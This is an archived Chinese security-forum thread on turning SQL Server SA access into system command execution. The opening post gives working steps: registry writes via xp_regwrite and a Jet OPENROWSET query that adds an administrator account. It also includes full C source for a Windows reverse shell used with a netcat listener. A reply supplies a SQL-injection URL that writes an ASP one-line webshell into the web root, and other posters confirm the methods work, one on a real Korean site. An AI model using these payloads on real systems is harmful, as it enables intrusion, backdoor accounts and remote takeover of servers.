[讨论]SA权限仅需xp_regwrite即可有dos shell
[讨论]SA权限仅需xp_regwrite即可有dos shell议题提交:L0op8ack
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
绝对比去想办法恢复xp_cmdshell来得经济实惠,不过需要猜一下系统路径
nt/2k: x:\winnt\system32\
xp/2003: x:\windows\system32\
如果有回显,可以看到执行返回结果,否则需要先判断主机OS类型再试
当然如果野蛮一点,四个轮流来一遍也行。
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
验证截图:
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/Mon_0601/9_2_562e381c26f3337.gif[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=3164¬humb=yes]jetoledbshell.gif[/url] (20 KB)
2006-1-2 09:10
附:
无法连接数据库服务器时(数据库一般不对外开放,但是可以对外访问),
可以使用反弹dos shell方式搞定
====================== CUT here =======================
//name : win32 connect back shell source for nt/2K/xp/2003
//compile : cl win32cbsh.c (vc6)
//usage :
//on your pc : nc -l -p {listen port}
//on vitim pc : win32cbsh {your ip} {listen port}
//warning : if there's no parameter specified, it will cause "fatal error"
#include <winsock2.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in adik_sin;
memset(&adik_sin,0,sizeof(adik_sin));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
adik_sin.sin_family=AF_INET;
adik_sin.sin_port=htons(atoi(argv[2]));
adik_sin.sin_addr.s_addr=inet_addr(argv[1]);
if(0!=connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin))) return -1;
si.cb=sizeof(si);
si.dwFlags=STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket;
CreateProcess(NULL,"cmd.exe",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
return 0;
}
====================== CUT here =======================
帖子15 精华[url=http://forum.eviloctal.com/digest.php?authorid=25342]0[/url] 积分52 阅读权限40 性别男 在线时间20 小时 注册时间2006-1-2 最后登录2006-5-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=25342]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=124200&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=124200&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-7047.html]wahahams[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
这里是引用第[0 楼]的l0op8ack于2006-01-02 09:10发表的:[讨论]SA权限仅需xp_regwrite即可有dos shell
议题提交:L0op8ack
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com]www.eviloctal.com[/url])
删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell
利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了
.......
office2003怎么搞都没用样
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=7047]0[/url] 积分12 阅读权限40 在线时间27 小时 注册时间2005-7-6 最后登录2008-2-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=7047]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=38173&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=38173&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-11912.html]pt007[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 好贴子,要是db_owern下能执行这个命令就爽了.每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!
[url=http://wpa.qq.com/msgrd?V=1&Uin=7491805&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子209 精华[url=http://forum.eviloctal.com/digest.php?authorid=11912]30[/url] 积分3816 阅读权限100 性别男 在线时间432 小时 注册时间2005-9-9 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=11912]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=38354&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=38354&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-61669.html]scriptboy[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 Cannot load the DLL xpstar.dll, or one of the DLLs it references. Reason: 126(The specified module could not be found.).
Why?
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=61669]0[/url] 积分9 阅读权限40 性别男 在线时间9 小时 注册时间2006-8-17 最后登录2008-6-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=61669]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100195&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100195&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-53997.html]xi4oyu[/url] [img]http://forum.eviloctal.com/customavatars/53997.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 貌似这个方法都出来好久了 [img]http://forum.eviloctal.com/images/smilies/yangcong/60.gif[/img]
帖子67 精华[url=http://forum.eviloctal.com/digest.php?authorid=53997]0[/url] 积分3362 阅读权限100 性别男 在线时间180 小时 注册时间2006-6-19 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=53997]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100203&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100203&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-53997.html]xi4oyu[/url] [img]http://forum.eviloctal.com/customavatars/53997.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 我再说一个方法,直接得webshell的,也要sa权限 [img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img] ,这年头,权限不好弄啊,呵呵[img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img]
用 sp_makewebtask直接在web目录里写入一句话马:
[url=http://127.0.0.1/dblogin123.asp?username=123]http://127.0.0.1/dblogin123.asp?username=123[/url]';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
前提是注入点是sa权限。
sp_makewebtask真是个好东西,知道表名就能够输出内容了。其中的一个问题困扰了我很久,今天终于得到解决:在用sp_makewebtask往文件里面写东西的时候,用到了select语句,但是只是用它来写<%execute(request("a"))%>,并不是对某个列的查询,写入一直出错。由于sp_makewebtask的第二个参数本身有个单引号在外面了,本以为select后面的内容加双引号就能成功写进去了,但是总是不能,偶尔发现是用两个单引号来直接写文本,单引号起着重定义的作用,本机试验成功。
sp_makewebtask的要求权限是sa,而且用这种方法的时候需要知道WEB的物理路径。但是有的管理员会删除某些扩展存储过程,这种方法也能算是个思路吧
方法是比较猥琐了点
[img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img] [img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img] [s:264] [s:264][img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img]
帖子67 精华[url=http://forum.eviloctal.com/digest.php?authorid=53997]0[/url] 积分3362 阅读权限100 性别男 在线时间180 小时 注册时间2006-6-19 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=53997]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100204&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100204&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 汗一下。。。我还以为是什么新东西。~这么老的东西都被楼上挖出来了。
楼上猥琐的方法在某些特定的情况下还是管用的。嘿嘿。昨天刚好遇到一个KR的站就这个情况~ [img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img]昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100222&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100222&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-66411.html]hackest[/url] [img]http://forum.eviloctal.com/customavatars/66411.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 经测试,LZ的方法确实有效……
[img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img]My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=297521327&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子882 精华[url=http://forum.eviloctal.com/digest.php?authorid=66411]20[/url] 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 [url=http://www.hackest.cn/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66411]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100371&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100371&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-66411.html]hackest[/url] [img]http://forum.eviloctal.com/customavatars/66411.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 经测试,5楼的方法同样有效
[img]http://forum.eviloctal.com/images/smilies/yangcong/58.gif[/img]My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=297521327&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子882 精华[url=http://forum.eviloctal.com/digest.php?authorid=66411]20[/url] 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 [url=http://www.hackest.cn/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66411]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=100372&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=100372&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-44951.html]zzhcool[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 net的权限被限制了,不能用net,直接xpcmd执行都是被拒绝,有啥好方法啊?
帖子15 精华[url=http://forum.eviloctal.com/digest.php?authorid=44951]2[/url] 积分60 阅读权限40 在线时间21 小时 注册时间2006-4-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=44951]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=142294&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=142294&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-48260.html]yzx65[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 ls的。试试net1.哈哈君子与其练达,不若朴鲁;与其曲谨,不若疏狂。
[url=http://wpa.qq.com/msgrd?V=1&Uin=171400180&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=48260]0[/url] 积分-133 阅读权限1 性别男 在线时间55 小时 注册时间2006-5-13 最后登录2008-7-16 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=48260]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=142297&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=142297&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-44951.html]zzhcool[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 .net1也不行,我都试过了,没有权限
组件我倒是都给恢复了,还有啥好的办法么?
帖子15 精华[url=http://forum.eviloctal.com/digest.php?authorid=44951]2[/url] 积分60 阅读权限40 在线时间21 小时 注册时间2006-4-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=44951]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=142326&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=142326&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-163236.html]guizige[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 但是不能回显的怎么办?
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=163236]0[/url] 积分3 阅读权限40 在线时间1 小时 注册时间2008-5-13 最后登录2008-6-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=163236]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=17847&repquote=142667&extra=page%3D5&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=17847&pid=142667&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-163393.html]eclipse07[/url] [img]http://forum.eviloctal.com/images/avatars/01.gif[/img]
晶莹剔透§烈日灼然
页:
[1]